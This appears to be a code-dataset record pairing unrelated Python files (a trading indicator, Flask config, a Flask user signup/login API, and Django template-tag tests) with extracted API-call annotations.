    middlebands = ma(source, period=period, matype=matype, sequential=True)
    upperbands = middlebands + devup * dev
    lowerbands = middlebands - devdn * dev
    if sequential:
        return BollingerBands(upperbands, middlebands, lowerbands)
    else:
        return BollingerBands(upperbands[-1], middlebands[-1], lowerbands[-1])
| [
"talib.STDDEV",
"collections.namedtuple",
"jesse.indicators.ma.ma",
"jesse.indicators.mean_ad.mean_ad",
"jesse.indicators.median_ad.median_ad",
"jesse.helpers.slice_candles",
"jesse.helpers.get_candle_source"
] | [((275, 345), 'collections.namedtuple', 'namedtuple', (['"""BollingerBands"""', "['upperband', 'middleband', 'lowerband']"], {}), "('BollingerBands', ['upperband', 'middleband', 'lowerband'])\n", (285, 345), False, 'from collections import namedtuple\n'), ((1020, 1054), 'jesse.helpers.slice_candles', 'slice_candles', (['candles', 'sequential'], {}), '(candles, sequential)\n', (1033, 1054), False, 'from jesse.helpers import get_candle_source, slice_candles\n'), ((1069, 1120), 'jesse.helpers.get_candle_source', 'get_candle_source', (['candles'], {'source_type': 'source_type'}), '(candles, source_type=source_type)\n', (1086, 1120), False, 'from jesse.helpers import get_candle_source, slice_candles\n'), ((1360, 1417), 'jesse.indicators.ma.ma', 'ma', (['source'], {'period': 'period', 'matype': 'matype', 'sequential': '(True)'}), '(source, period=period, matype=matype, sequential=True)\n', (1362, 1417), False, 'from jesse.indicators.ma import ma\n'), ((1156, 1184), 'talib.STDDEV', 'talib.STDDEV', (['source', 'period'], {}), '(source, period)\n', (1168, 1184), False, 'import talib\n'), ((1221, 1261), 'jesse.indicators.mean_ad.mean_ad', 'mean_ad', (['source', 'period'], {'sequential': '(True)'}), '(source, period, sequential=True)\n', (1228, 1261), False, 'from jesse.indicators.mean_ad import mean_ad\n'), ((1298, 1340), 'jesse.indicators.median_ad.median_ad', 'median_ad', (['source', 'period'], {'sequential': '(True)'}), '(source, period, sequential=True)\n', (1307, 1340), False, 'from jesse.indicators.median_ad import median_ad\n')] |
""" Global Flask Application Settings """
import os
from app import app
class Config(object):
    # Base configuration: conservative defaults shared by all environments.
    DEBUG = False
    TESTING = False
    PRODUCTION = False
class Development(Config):
    # Local development settings: debug mode enabled.
    MODE = 'Development'
    DEBUG = True
class Production(Config):
    # Production settings: debugging explicitly disabled.
    MODE = 'Production'
    DEBUG = False
    PRODUCTION = True
# Set FLASK_CONFIG env to 'Production' or 'Development' to set Config
# (falls back to 'Development' when the variable is unset).
flask_config = os.environ.get('FLASK_CONFIG', 'Development')
app.config.from_object('app.config.{}'.format(flask_config))
| [
"os.environ.get"
] | [((408, 453), 'os.environ.get', 'os.environ.get', (['"""FLASK_CONFIG"""', '"""Development"""'], {}), "('FLASK_CONFIG', 'Development')\n", (422, 453), False, 'import os\n')] |
from flask import Blueprint, jsonify, make_response
from flask_restful import Resource, Api, reqparse, inputs
from ..models.decorators import admin_required
from ..models.models import UserModel
import os
class SignUp(Resource):
    def __init__(self):
        """
        Validates both json and form-data input
        """
        self.reqparse = reqparse.RequestParser()
        # username: at least one non-whitespace character required
        self.reqparse.add_argument(
            'username',
            required=True,
            help='kindly provide a valid username',
            type=inputs.regex(r"(.*\S.*)"),
            location=['form', 'json'])
        # email: must match a basic address pattern
        self.reqparse.add_argument(
            'email',
            required=True,
            help='kindly provide a valid email address',
            location=['form', 'json'],
            type=inputs.regex(r"(^[a-zA-Z0-9_.+-]+@[a-zA-Z0-9-]+\.[a-zA-Z0-9-.]+$)"))
        self.reqparse.add_argument(
            'password',
            required=True,
            trim=True,
            help='kindly provide a valid password',
            location=['form', 'json'])
        self.reqparse.add_argument(
            'confirm_password',
            required=True,
            trim=True,
            help='kindly provide a valid confirmation password',
            location=['form', 'json'])
        super(SignUp, self).__init__()
    def post(self):
        """
        Register a new user
        """
        kwargs = self.reqparse.parse_args()
        username = kwargs.get('username')
        email = kwargs.get('email')
        password = kwargs.get('password')
        confirm_password = kwargs.get('confirm_password')
        # Reject duplicate usernames before any other validation (400).
        username_exist = UserModel.get_one('users', username=username)
        if username_exist:
            return make_response(jsonify({'message': 'username already taken'}), 400)
        if password == confirm_password:
            if len(password) >= 8:
                email_exists = UserModel.get_one('users', email=email)
                if not email_exists:
                    # The username matching the ADMIN env var is
                    # auto-promoted to admin right after creation.
                    if username == os.getenv('ADMIN'):
                        user = UserModel(username=username, email=email, password=password)
                        user.create_user()
                        fetch_admin = UserModel.get_one('users', username=username)
                        data = {'admin': True}
                        UserModel.update('users', id=fetch_admin[0], data=data)
                        user = UserModel.get_one('users', id=fetch_admin[0])
                        # NOTE(review): this branch returns a default 200,
                        # unlike the 201 used for regular signups — confirm
                        # this asymmetry is intended.
                        return jsonify({'admin': UserModel.user_details(user)})
                    user = UserModel(username=username, email=email, password=password)
                    user.create_user()
                    user = UserModel.get_one('users', username=username)
                    return make_response(jsonify({'message': 'successfully registered', 'user': UserModel.user_details(user)}), 201)
                return make_response(jsonify({'message': 'email already taken'}), 203)
            return make_response(jsonify({'message': 'password should be atleast 8 characters'}), 400)
        return make_response(jsonify({"message" : "password and confirm password should be identical"}), 400)
class AllUsers(Resource):
    """Admin-only listing of every registered user."""
    @admin_required
    def get(self):
        """Return details for all users, or a notice when none exist yet."""
        records = UserModel.get_all('users')
        if records:
            details = [UserModel.user_details(record) for record in records]
            return make_response(jsonify({'all_users': details}))
        return jsonify({'message': 'no users found yet'})
class PromoteUser(Resource):
    """Admin-only endpoint that grants admin rights to an existing user."""
    @admin_required
    def put(self, user_id):
        """Flag the user identified by ``user_id`` as an admin."""
        record = UserModel.get_one('users', id=user_id)
        if not record:
            return jsonify({'message': 'user not found'})
        UserModel.update('users', id=record[0], data={'admin': True})
        promoted = UserModel.get_one('users', id=user_id)
        return jsonify({'user': UserModel.user_details(promoted)})
class Login(Resource):
    """Authenticate a user by email and password and hand out a token."""

    def __init__(self):
        # Credentials are accepted from either form data or a JSON body.
        self.reqparse = reqparse.RequestParser()
        self.reqparse.add_argument(
            'email',
            required=True,
            help='kindly provide a valid email address',
            location=['form', 'json'],
            type=inputs.regex(r"(^[a-zA-Z0-9_.+-]+@[a-zA-Z0-9-]+\.[a-zA-Z0-9-.]+$)"))
        self.reqparse.add_argument(
            'password',
            required=True,
            trim=True,
            help='kindly provide a valid password',
            location=['form', 'json'])
        super(Login, self).__init__()

    def post(self):
        """Verify the supplied credentials and return an auth token."""
        credentials = self.reqparse.parse_args()
        user = UserModel.get_one('users', email=credentials.get('email'))
        if user is None:
            return make_response(jsonify({'message': 'invalid email or password'}), 404)
        password_ok = UserModel.validate_password(
            password=credentials.get('password'), email=user[2])
        if password_ok:
            token = UserModel.generate_token(user)
            return make_response(jsonify({'message': 'you are successfully logged in', 'token': token}), 200)
        return make_response(jsonify({'message': 'invalid email or password'}), 401)
# Blueprint wiring: expose the user resources under a single REST API.
users_api = Blueprint('resources.users', __name__)
api = Api(users_api)
# Route registrations for authentication and user-management endpoints.
api.add_resource(SignUp, '/auth/signup', endpoint='signup')
api.add_resource(AllUsers, '/users')
api.add_resource(PromoteUser, '/users/<int:user_id>')
api.add_resource(Login, '/auth/login', endpoint='login')
| [
"flask_restful.reqparse.RequestParser",
"os.getenv",
"flask_restful.Api",
"flask_restful.inputs.regex",
"flask.Blueprint",
"flask.jsonify"
] | [((5152, 5190), 'flask.Blueprint', 'Blueprint', (['"""resources.users"""', '__name__'], {}), "('resources.users', __name__)\n", (5161, 5190), False, 'from flask import Blueprint, jsonify, make_response\n'), ((5197, 5211), 'flask_restful.Api', 'Api', (['users_api'], {}), '(users_api)\n', (5200, 5211), False, 'from flask_restful import Resource, Api, reqparse, inputs\n'), ((351, 375), 'flask_restful.reqparse.RequestParser', 'reqparse.RequestParser', ([], {}), '()\n', (373, 375), False, 'from flask_restful import Resource, Api, reqparse, inputs\n'), ((3972, 3996), 'flask_restful.reqparse.RequestParser', 'reqparse.RequestParser', ([], {}), '()\n', (3994, 3996), False, 'from flask_restful import Resource, Api, reqparse, inputs\n'), ((3100, 3173), 'flask.jsonify', 'jsonify', (["{'message': 'password and confirm password should be identical'}"], {}), "({'message': 'password and confirm password should be identical'})\n", (3107, 3173), False, 'from flask import Blueprint, jsonify, make_response\n'), ((3333, 3375), 'flask.jsonify', 'jsonify', (["{'message': 'no users found yet'}"], {}), "({'message': 'no users found yet'})\n", (3340, 3375), False, 'from flask import Blueprint, jsonify, make_response\n'), ((3654, 3692), 'flask.jsonify', 'jsonify', (["{'message': 'user not found'}"], {}), "({'message': 'user not found'})\n", (3661, 3692), False, 'from flask import Blueprint, jsonify, make_response\n'), ((5081, 5130), 'flask.jsonify', 'jsonify', (["{'message': 'invalid email or password'}"], {}), "({'message': 'invalid email or password'})\n", (5088, 5130), False, 'from flask import Blueprint, jsonify, make_response\n'), ((532, 557), 'flask_restful.inputs.regex', 'inputs.regex', (['"""(.*\\\\S.*)"""'], {}), "('(.*\\\\S.*)')\n", (544, 557), False, 'from flask_restful import Resource, Api, reqparse, inputs\n'), ((795, 862), 'flask_restful.inputs.regex', 'inputs.regex', (['"""(^[a-zA-Z0-9_.+-]+@[a-zA-Z0-9-]+\\\\.[a-zA-Z0-9-.]+$)"""'], {}), 
"('(^[a-zA-Z0-9_.+-]+@[a-zA-Z0-9-]+\\\\.[a-zA-Z0-9-.]+$)')\n", (807, 862), False, 'from flask_restful import Resource, Api, reqparse, inputs\n'), ((1753, 1799), 'flask.jsonify', 'jsonify', (["{'message': 'username already taken'}"], {}), "({'message': 'username already taken'})\n", (1760, 1799), False, 'from flask import Blueprint, jsonify, make_response\n'), ((3001, 3064), 'flask.jsonify', 'jsonify', (["{'message': 'password should be atleast 8 characters'}"], {}), "({'message': 'password should be atleast 8 characters'})\n", (3008, 3064), False, 'from flask import Blueprint, jsonify, make_response\n'), ((4194, 4261), 'flask_restful.inputs.regex', 'inputs.regex', (['"""(^[a-zA-Z0-9_.+-]+@[a-zA-Z0-9-]+\\\\.[a-zA-Z0-9-.]+$)"""'], {}), "('(^[a-zA-Z0-9_.+-]+@[a-zA-Z0-9-]+\\\\.[a-zA-Z0-9-.]+$)')\n", (4206, 4261), False, 'from flask_restful import Resource, Api, reqparse, inputs\n'), ((4760, 4809), 'flask.jsonify', 'jsonify', (["{'message': 'invalid email or password'}"], {}), "({'message': 'invalid email or password'})\n", (4767, 4809), False, 'from flask import Blueprint, jsonify, make_response\n'), ((4975, 5045), 'flask.jsonify', 'jsonify', (["{'message': 'you are successfully logged in', 'token': token}"], {}), "({'message': 'you are successfully logged in', 'token': token})\n", (4982, 5045), False, 'from flask import Blueprint, jsonify, make_response\n'), ((2918, 2961), 'flask.jsonify', 'jsonify', (["{'message': 'email already taken'}"], {}), "({'message': 'email already taken'})\n", (2925, 2961), False, 'from flask import Blueprint, jsonify, make_response\n'), ((2025, 2043), 'os.getenv', 'os.getenv', (['"""ADMIN"""'], {}), "('ADMIN')\n", (2034, 2043), False, 'import os\n')] |
"""
Test the model blocks
"""
import datetime
from django.test import TestCase
from mock import Mock
from django.db.models import Model, IntegerField, DateTimeField, CharField
from django.template import Context, Template, TemplateSyntaxError
from example_project.pepulator_factory.models import Pepulator, Distributor
from model_blocks.templatetags import model_filters
from model_blocks.templatetags import model_nodes
class DetailBlockFilterTest(TestCase):
    """Exercise the ``as_detail_block`` template filter."""

    fixtures = ['pepulator_factory_data.json']

    # Field portion of the rendering for fixture pepulator #1235, as produced
    # by the fake template installed in setUp(); shared by three tests below.
    PEPULATOR_1235_FIELDS = (
        u"serial_number,serial number,1235,"
        u"height,height,12,"
        u"width,width,15,"
        u"manufacture_date,manufacture date,2011-06-10 11:12:33,"
        u"color,color,red,"
        u"address,address,@ppr://1235/,"
        u"distributed_by,distributed by,Walmart,"
        u"knuckles,knuckles,[Knuckle of hardness 2.35,Knuckle of hardness 1.10,],"
        u"jambs,jambs,[],"
    )

    def setUp(self):
        # Replace Django's template loader so no real file is read; the
        # stand-in template serializes the context for inspection.
        fake_template = Template(
            '{{ title|default_if_none:instance|safe }}:{{ model|safe }},'
            '{% for name, label, value, is_list, is_link in fields %}'
            '{{ name|safe }},'
            '{{ label|safe }},'
            '{% if not is_list %}'
            '{% if is_link %}'
            '@{{ value }}'
            '{% else %}'
            '{{ value|safe }}'
            '{% endif %}'
            '{% else %}'
            '[{% for item in value.all %}{{ item|safe }},{% endfor %}]'
            '{% endif %},'
            '{% endfor %}')
        model_nodes.get_template = Mock(return_value=fake_template)

    def test_model_format(self):
        """A model instance renders with its title, model name, and fields."""
        instance = Pepulator.objects.get(serial_number=1235)

        rendered = model_filters.as_detail_block(instance)

        model_nodes.get_template.assert_called_with('model_blocks/object_detail.html')
        self.assertEqual(rendered,
                         u"Pepulator #1235:pepulator," + self.PEPULATOR_1235_FIELDS)

    def test_filter_is_registered(self):
        """The filter is usable from inside a template."""
        template = Template('{% load model_filters %}'
                            '{{ pepulator|as_detail_block }}')
        instance = Pepulator.objects.get(serial_number=1235)

        rendered = template.render(Context({'pepulator': instance}))

        model_nodes.get_template.assert_called_with('model_blocks/object_detail.html')
        self.assertEqual(rendered,
                         u"Pepulator #1235:pepulator," + self.PEPULATOR_1235_FIELDS)

    def test_title_is_used(self):
        """An explicit title argument replaces the default instance title."""
        template = Template('{% load model_filters %}'
                            '{{ pepulator|as_detail_block:"My Pepulator" }}')
        instance = Pepulator.objects.get(serial_number=1235)

        rendered = template.render(Context({'pepulator': instance}))

        model_nodes.get_template.assert_called_with('model_blocks/object_detail.html')
        self.assertEqual(rendered,
                         u"My Pepulator:pepulator," + self.PEPULATOR_1235_FIELDS)

    def test_related_fields(self):
        """Reverse-related fields not defined on the model are included."""
        distributor = Distributor.objects.get(name="Mom & Pop")

        rendered = model_filters.as_detail_block(distributor)

        model_nodes.get_template.assert_called_with('model_blocks/object_detail.html')
        self.assertEqual(
            rendered,
            u"Mom & Pop:distributor,"
            u"name,name,Mom & Pop,"
            u"capacity,capacity,175,"
            u"stock,stock,[Pepulator #1238,],")
class TeaserBlockFilterTest(TestCase):
    """Exercise the ``as_teaser_block`` template filter."""

    fixtures = ['pepulator_factory_data.json']

    def setUp(self):
        # Replace Django's template loader so no real file is read; the
        # stand-in template serializes the context for inspection.
        fake_template = Template(
            '{{ title|default_if_none:instance|safe }}:{{ model|safe }},'
            '{% for name, label, value, is_list in fields %}'
            '{{ name|safe }},{{ label|safe }},'
            '{% if not is_list %}{{ value|safe }}'
            '{% else %}[{% for item in value.all %}{{ item|safe }},{% endfor %}]'
            '{% endif %},'
            '{% endfor %}')
        model_nodes.get_template = Mock(return_value=fake_template)

    def test_model_format(self):
        """A model instance renders with its title, model name, and fields."""
        instance = Pepulator.objects.get(serial_number=1235)

        rendered = model_filters.as_teaser_block(instance)

        model_nodes.get_template.assert_called_with('model_blocks/object_teaser.html')
        self.assertEqual(
            rendered,
            u"Pepulator #1235:pepulator,"
            u"serial_number,serial number,1235,"
            u"height,height,12,"
            u"width,width,15,"
            u"manufacture_date,manufacture date,2011-06-10 11:12:33,"
            u"color,color,red,"
            u"address,address,ppr://1235/,"
            u"distributed_by,distributed by,Walmart,"
            u"knuckles,knuckles,[Knuckle of hardness 2.35,Knuckle of hardness 1.10,],"
            u"jambs,jambs,[],")
class ListBlockFilterTest(TestCase):
    """Exercise the ``as_list_block`` template filter."""

    fixtures = ['pepulator_factory_data.json']

    def setUp(self):
        # Replace Django's template loader so no real file is read; the
        # stand-in template echoes the title (or pluralized model name)
        # followed by the repr of the instance list.
        fake_template = Template(
            '{{ title|default_if_none:model|capfirst }}'
            '{% if not title %}s{% endif %}:{{ instance_list|safe }}')
        model_nodes.get_template = Mock(return_value=fake_template)

    def test_list_format(self):
        """A queryset renders as a pluralized model name plus its items."""
        queryset = Pepulator.objects.filter(serial_number__gt=2000)

        rendered = model_filters.as_list_block(queryset)

        model_nodes.get_template.assert_called_with('model_blocks/object_list.html')
        self.assertEqual(
            rendered,
            u"Pepulators:[<Pepulator: Pepulator #2345>, "
            u"<Pepulator: Pepulator #2346>]")

    def test_filter_is_registered(self):
        """The filter is usable from inside a template."""
        template = Template('{% load model_filters %}'
                            '{{ pepulators|as_list_block }}')
        queryset = Pepulator.objects.filter(serial_number__gt=2000)

        rendered = template.render(Context({'pepulators': queryset}))

        model_nodes.get_template.assert_called_with('model_blocks/object_list.html')
        self.assertEqual(
            rendered,
            u"Pepulators:[<Pepulator: Pepulator #2345>, "
            u"<Pepulator: Pepulator #2346>]")

    def test_empty_queryset(self):
        """An empty queryset still renders the pluralized model name."""
        template = Template('{% load model_filters %}'
                            '{{ pepulators|as_list_block }}')
        queryset = Pepulator.objects.filter(serial_number__gt=5000)

        rendered = template.render(Context({'pepulators': queryset}))

        model_nodes.get_template.assert_called_with('model_blocks/object_list.html')
        self.assertEqual(rendered, u"Pepulators:[]")

    def test_non_query_set_results_in_no_model(self):
        """A plain list carries no model, so the title falls back to None.

        The model is read off of the queryset; a bare list of objects gives
        no way to know it.
        """
        template = Template('{% load model_filters %}'
                            '{{ pepulators|as_list_block }}')
        instances = list(Pepulator.objects.filter(serial_number__gt=2000))

        rendered = template.render(Context({'pepulators': instances}))

        model_nodes.get_template.assert_called_with('model_blocks/object_list.html')
        self.assertEqual(
            rendered,
            u"Nones:[<Pepulator: Pepulator #2345>, "
            u"<Pepulator: Pepulator #2346>]")

    def test_empty_list(self):
        """An empty plain list renders with the None pseudo-title."""
        template = Template('{% load model_filters %}'
                            '{{ pepulators|as_list_block }}')

        rendered = template.render(Context({'pepulators': []}))

        model_nodes.get_template.assert_called_with('model_blocks/object_list.html')
        self.assertEqual(rendered, u"Nones:[]")

    def test_alternate_title_is_used(self):
        """An explicit list title overrides the pluralized model name."""
        template = Template('{% load model_filters %}'
                            '{{ pepulators|as_list_block:"Some Pepulators" }}')
        queryset = Pepulator.objects.filter(serial_number__gt=2000)

        rendered = template.render(Context({'pepulators': queryset}))

        model_nodes.get_template.assert_called_with('model_blocks/object_list.html')
        self.assertEqual(
            rendered,
            u"Some Pepulators:[<Pepulator: Pepulator #2345>, "
            u"<Pepulator: Pepulator #2346>]")
class DetailBlockTagTest(TestCase):
    """Exercise the ``{% detail_block %}`` template tag."""

    fixtures = ['pepulator_factory_data.json']

    def setUp(self):
        # Replace Django's template loader so no real file is read; the
        # stand-in template serializes the context for inspection.
        fake_template = Template(
            '{{ title|default_if_none:instance|safe }}:{{ model|safe }},'
            '{% for name, label, value, is_list in fields %}'
            '{{ name|safe }},{{ label|safe }},'
            '{% if not is_list %}{{ value|safe }}'
            '{% else %}[{% for item in value.all %}{{ item|safe }},{% endfor %}]'
            '{% endif %},'
            '{% endfor %}')
        model_nodes.get_template = Mock(return_value=fake_template)

    def test_tag_is_registered(self):
        """The tag is usable in a template and honors the template override."""
        template = Template(
            '{% load model_tags %}'
            '{% with pepulator_factory_pepulator_detail_template='
            '"pepulator_factory/pepulator_detail.html" %}'
            '{% detail_block pepulator %}'
            '{% endwith %}')
        instance = Pepulator.objects.get(serial_number=1235)

        rendered = template.render(Context({'pepulator': instance}))

        model_nodes.get_template.assert_called_with('pepulator_factory/pepulator_detail.html')
        self.assertEqual(
            rendered,
            u"Pepulator #1235:pepulator,"
            u"serial_number,serial number,1235,"
            u"height,height,12,"
            u"width,width,15,"
            u"manufacture_date,manufacture date,2011-06-10 11:12:33,"
            u"color,color,red,"
            u"address,address,ppr://1235/,"
            u"distributed_by,distributed by,Walmart,"
            u"knuckles,knuckles,[Knuckle of hardness 2.35,Knuckle of hardness 1.10,],"
            u"jambs,jambs,[],")

    def test_with_specific_fields(self):
        """An include-fields variable restricts and orders the fields shown."""
        template = Template(
            '{% load model_tags %}'
            '{% with pepulator_factory_pepulator_detail_template='
            '"pepulator_factory/pepulator_detail.html" %}'
            '{% with pepulator_factory_pepulator_fields='
            '"serial_number, color, height, width" %}'
            '{% detail_block pepulator %}'
            '{% endwith %}'
            '{% endwith %}')
        instance = Pepulator.objects.get(serial_number=1235)

        rendered = template.render(Context({'pepulator': instance}))

        self.assertEqual(
            rendered,
            u"Pepulator #1235:pepulator,"
            u"serial_number,serial number,1235,"
            u"color,color,red,"
            u"height,height,12,"
            u"width,width,15,")

    def test_with_excluded_fields(self):
        """An exclude variable removes the named fields from the rendering."""
        template = Template(
            '{% load model_tags %}'
            '{% with pepulator_factory_pepulator_detail_template='
            '"pepulator_factory/pepulator_detail.html" %}'
            '{% with pepulator_factory_pepulator_exclude='
            '"knuckles, jambs, color, address" %}'
            '{% detail_block pepulator %}'
            '{% endwith %}'
            '{% endwith %}')
        instance = Pepulator.objects.get(serial_number=1235)

        rendered = template.render(Context({'pepulator': instance}))

        self.assertEqual(
            rendered,
            u"Pepulator #1235:pepulator,"
            u"serial_number,serial number,1235,"
            u"height,height,12,"
            u"width,width,15,"
            u"manufacture_date,manufacture date,2011-06-10 11:12:33,"
            u"distributed_by,distributed by,Walmart,")

    def test_fail_on_wrong_number_of_arguments(self):
        """Both too many and too few arguments raise a syntax error."""
        for bad_source in ('{% load model_tags %}'
                           '{% detail_block pepulator "overflow" %}',
                           '{% load model_tags %}'
                           '{% detail_block %}'):
            self.assertRaises(TemplateSyntaxError, Template, bad_source)
class TeaserBlockTagTest(TestCase):
    """Exercise the ``{% teaser_block %}`` template tag."""

    fixtures = ['pepulator_factory_data.json']

    def setUp(self):
        # Replace Django's template loader so no real file is read; the
        # stand-in template serializes the context for inspection.
        fake_template = Template(
            '{{ title|default_if_none:instance|safe }}:{{ model|safe }},'
            '{% for name, label, value, is_list in fields %}'
            '{{ name|safe }},{{ label|safe }},'
            '{% if not is_list %}{{ value|safe }}'
            '{% else %}[{% for item in value.all %}{{ item|safe }},{% endfor %}]'
            '{% endif %},'
            '{% endfor %}')
        model_nodes.get_template = Mock(return_value=fake_template)

    def test_tag_is_registered(self):
        """The tag is usable in a template and honors the template override."""
        template = Template(
            '{% load model_tags %}'
            '{% with pepulator_factory_pepulator_teaser_template='
            '"pepulator_factory/pepulator_teaser.html" %}'
            '{% teaser_block pepulator %}'
            '{% endwith %}')
        instance = Pepulator.objects.get(serial_number=1235)

        rendered = template.render(Context({'pepulator': instance}))

        model_nodes.get_template.assert_called_with('pepulator_factory/pepulator_teaser.html')
        self.assertEqual(
            rendered,
            u"Pepulator #1235:pepulator,"
            u"serial_number,serial number,1235,"
            u"height,height,12,"
            u"width,width,15,"
            u"manufacture_date,manufacture date,2011-06-10 11:12:33,"
            u"color,color,red,"
            u"address,address,ppr://1235/,"
            u"distributed_by,distributed by,Walmart,"
            u"knuckles,knuckles,[Knuckle of hardness 2.35,Knuckle of hardness 1.10,],"
            u"jambs,jambs,[],")

    def test_fail_on_wrong_number_of_arguments(self):
        """Both too many and too few arguments raise a syntax error."""
        for bad_source in ('{% load model_tags %}'
                           '{% teaser_block pepulator "overflow" %}',
                           '{% load model_tags %}'
                           '{% teaser_block %}'):
            self.assertRaises(TemplateSyntaxError, Template, bad_source)
class ListBlockTagTest(TestCase):
    """Exercise the ``{% list_block %}`` template tag."""

    fixtures = ['pepulator_factory_data.json']

    def setUp(self):
        # Replace Django's template loader so no real file is read; the
        # stand-in template echoes the title (or pluralized model name)
        # followed by the repr of the instance list.
        fake_template = Template(
            '{{ title|default_if_none:model|capfirst }}'
            '{% if not title %}s{% endif %}:{{ instance_list|safe }}')
        model_nodes.get_template = Mock(return_value=fake_template)

    def test_filter_is_registered(self):
        """The tag is usable in a template and honors the template override."""
        template = Template(
            '{% load model_tags %}'
            '{% with pepulator_factory_pepulator_list_template='
            '"pepulator_factory/pepulator_list.html" %}'
            '{% list_block pepulators %}'
            '{% endwith %}')
        queryset = Pepulator.objects.filter(serial_number__gt=2000)

        rendered = template.render(Context({'pepulators': queryset}))

        model_nodes.get_template.assert_called_with('pepulator_factory/pepulator_list.html')
        self.assertEqual(
            rendered,
            u"Pepulators:[<Pepulator: Pepulator #2345>, "
            u"<Pepulator: Pepulator #2346>]")

    def test_fail_on_wrong_number_of_arguments(self):
        """Both too many and too few arguments raise a syntax error."""
        for bad_source in ('{% load model_tags %}'
                           '{% list_block pepulators "overflow" %}',
                           '{% load model_tags %}'
                           '{% list_block %}'):
            self.assertRaises(TemplateSyntaxError, Template, bad_source)
class ModelBlockModuleTest(TestCase):
    """Smoke-test that the combined ``model_blocks`` tag library loads."""

    def test_all_tags_and_filters_loaded(self):
        """Compiling a template using every tag/filter must not raise.

        Getting past Template() without a TemplateSyntaxError is the whole
        test; the final assertion just records success.
        """
        template = Template(
            '{% load model_blocks %}'
            '{% detail_block pepulator %}'
            '{% list_block pepulators %}'
            '{{ pepulator|as_detail_block }}'
            '{{ pepulators|as_list_block }}')
        # ``self.assert_`` is a deprecated unittest alias (removed in
        # Python 3.12); use the canonical ``assertTrue`` instead.
        self.assertTrue(template is not None)
class SideEffectsTest(TestCase):
    """Check that block tags do not leak context variables."""

    fixtures = ['pepulator_factory_data.json']

    def setUp(self):
        # Replace Django's template loader so no real file is read; the
        # stand-in template echoes the title (or pluralized model name).
        fake_template = Template(
            '{{ title|default_if_none:model|capfirst }}'
            '{% if not title %}s{% endif %}')
        model_nodes.get_template = Mock(return_value=fake_template)

    def test_model_doesnt_carry_over_into_future_blocks(self):
        """The ``model`` variable set inside a block is restored afterwards."""
        template = Template(
            '{% load model_tags %}'
            '{{ model }}'
            '{% list_block distributors %}'
            '{{ model }}')
        context = Context({'model': 'My String',
                           'distributors': Distributor.objects.all()})

        rendered = template.render(context)

        # "My String" must reappear after the block, proving the block's own
        # "model" context entry was popped.
        self.assertEqual(rendered, u"My StringDistributorsMy String")
| [
"example_project.pepulator_factory.models.Distributor.objects.get",
"model_blocks.templatetags.model_nodes.get_template.assert_called_with",
"model_blocks.templatetags.model_filters.as_teaser_block",
"django.template.Template",
"model_blocks.templatetags.model_filters.as_list_block",
"model_blocks.templat... | [((1753, 1794), 'example_project.pepulator_factory.models.Pepulator.objects.get', 'Pepulator.objects.get', ([], {'serial_number': '(1235)'}), '(serial_number=1235)\n', (1774, 1794), False, 'from example_project.pepulator_factory.models import Pepulator, Distributor\n'), ((2311, 2351), 'model_blocks.templatetags.model_filters.as_detail_block', 'model_filters.as_detail_block', (['pepulator'], {}), '(pepulator)\n', (2340, 2351), False, 'from model_blocks.templatetags import model_filters\n'), ((2369, 2447), 'model_blocks.templatetags.model_nodes.get_template.assert_called_with', 'model_nodes.get_template.assert_called_with', (['"""model_blocks/object_detail.html"""'], {}), "('model_blocks/object_detail.html')\n", (2412, 2447), False, 'from model_blocks.templatetags import model_nodes\n'), ((2647, 2714), 'django.template.Template', 'Template', (['"""{% load model_filters %}{{ pepulator|as_detail_block }}"""'], {}), "('{% load model_filters %}{{ pepulator|as_detail_block }}')\n", (2655, 2714), False, 'from django.template import Context, Template, TemplateSyntaxError\n'), ((2778, 2819), 'example_project.pepulator_factory.models.Pepulator.objects.get', 'Pepulator.objects.get', ([], {'serial_number': '(1235)'}), '(serial_number=1235)\n', (2799, 2819), False, 'from example_project.pepulator_factory.models import Pepulator, Distributor\n'), ((2838, 2871), 'django.template.Context', 'Context', (["{'pepulator': pepulator}"], {}), "({'pepulator': pepulator})\n", (2845, 2871), False, 'from django.template import Context, Template, TemplateSyntaxError\n'), ((3429, 3507), 'model_blocks.templatetags.model_nodes.get_template.assert_called_with', 'model_nodes.get_template.assert_called_with', (['"""model_blocks/object_detail.html"""'], {}), "('model_blocks/object_detail.html')\n", (3472, 3507), False, 'from model_blocks.templatetags import model_nodes\n'), ((3682, 3769), 'django.template.Template', 'Template', (['"""{% load model_filters %}{{ 
pepulator|as_detail_block:"My Pepulator" }}"""'], {}), '(\n \'{% load model_filters %}{{ pepulator|as_detail_block:"My Pepulator" }}\')\n', (3690, 3769), False, 'from django.template import Context, Template, TemplateSyntaxError\n'), ((3828, 3869), 'example_project.pepulator_factory.models.Pepulator.objects.get', 'Pepulator.objects.get', ([], {'serial_number': '(1235)'}), '(serial_number=1235)\n', (3849, 3869), False, 'from example_project.pepulator_factory.models import Pepulator, Distributor\n'), ((3888, 3921), 'django.template.Context', 'Context', (["{'pepulator': pepulator}"], {}), "({'pepulator': pepulator})\n", (3895, 3921), False, 'from django.template import Context, Template, TemplateSyntaxError\n'), ((4476, 4554), 'model_blocks.templatetags.model_nodes.get_template.assert_called_with', 'model_nodes.get_template.assert_called_with', (['"""model_blocks/object_detail.html"""'], {}), "('model_blocks/object_detail.html')\n", (4519, 4554), False, 'from model_blocks.templatetags import model_nodes\n'), ((4741, 4782), 'example_project.pepulator_factory.models.Distributor.objects.get', 'Distributor.objects.get', ([], {'name': '"""Mom & Pop"""'}), "(name='Mom & Pop')\n", (4764, 4782), False, 'from example_project.pepulator_factory.models import Pepulator, Distributor\n'), ((4990, 5030), 'model_blocks.templatetags.model_filters.as_detail_block', 'model_filters.as_detail_block', (['pepulator'], {}), '(pepulator)\n', (5019, 5030), False, 'from model_blocks.templatetags import model_filters\n'), ((5048, 5126), 'model_blocks.templatetags.model_nodes.get_template.assert_called_with', 'model_nodes.get_template.assert_called_with', (['"""model_blocks/object_detail.html"""'], {}), "('model_blocks/object_detail.html')\n", (5091, 5126), False, 'from model_blocks.templatetags import model_nodes\n'), ((5922, 5963), 'example_project.pepulator_factory.models.Pepulator.objects.get', 'Pepulator.objects.get', ([], {'serial_number': '(1235)'}), '(serial_number=1235)\n', (5943, 5963), 
